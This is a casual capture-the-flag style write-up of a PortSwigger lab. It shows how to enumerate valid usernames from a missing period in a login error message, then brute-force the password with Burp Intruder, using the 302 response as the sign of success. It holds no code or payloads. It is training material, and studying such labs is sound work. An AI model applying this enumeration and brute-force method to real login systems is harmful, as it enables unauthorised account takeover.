Authentication
Username enumeration via subtly different responses
Yo, people!😎 It’s been a while. Here is another lab solution based on PortSwigger Labs. This lab is subtly vulnerable to username enumeration and password brute-force attacks. It has an account with a predictable username and password, which can be found in the following wordlists. Our task is to find the valid credentials and log in. Let’s go, guys!
Candidate usernames
Candidate passwords
Authentication
Authentication vulnerability is a weakness in a system that allows attackers to bypass or break the process used to verify users’ identities.
End Goals:
- Login valid credentials.
Steps To Reproduce:
- Check all the features and functionality of the application. Be sure to enable your proxy to capture and analyze the and then go to the login functionality pages.
- Enter any username and password you want, then send the request to the Intruder tab and modify some settings.
- In the Payloads make sure that the Simple list payload type is selected and the list of candidate usernames, then in the Settings side panel.Under Grep - Extract, click Add. in the response that appearwe show scroll down we will see
Invalid username or password.Use the mouse to highlight the text content of the message. then click ok to start the attacks.
- In the results, we can see one response that doesn’t have a period in the error message. This indicates it’s valid. Let’s notice the username.
- We have a valid username, so now let’s enumerate the passwords to get the full credentials.
- paste the list of passowrd in the payload configuration and start the attacks.
- Only one response has a different code, 302, which means we have a valid password.
- Logging in we sloved the labs.
That’s all, friends. Thank you for reading up to this point. I would like to hear your feedback on anything not clear here. Here is my Twitter account @T3chnocr4t. Feel free to DM me if you have any issues with my write-up. Thanks!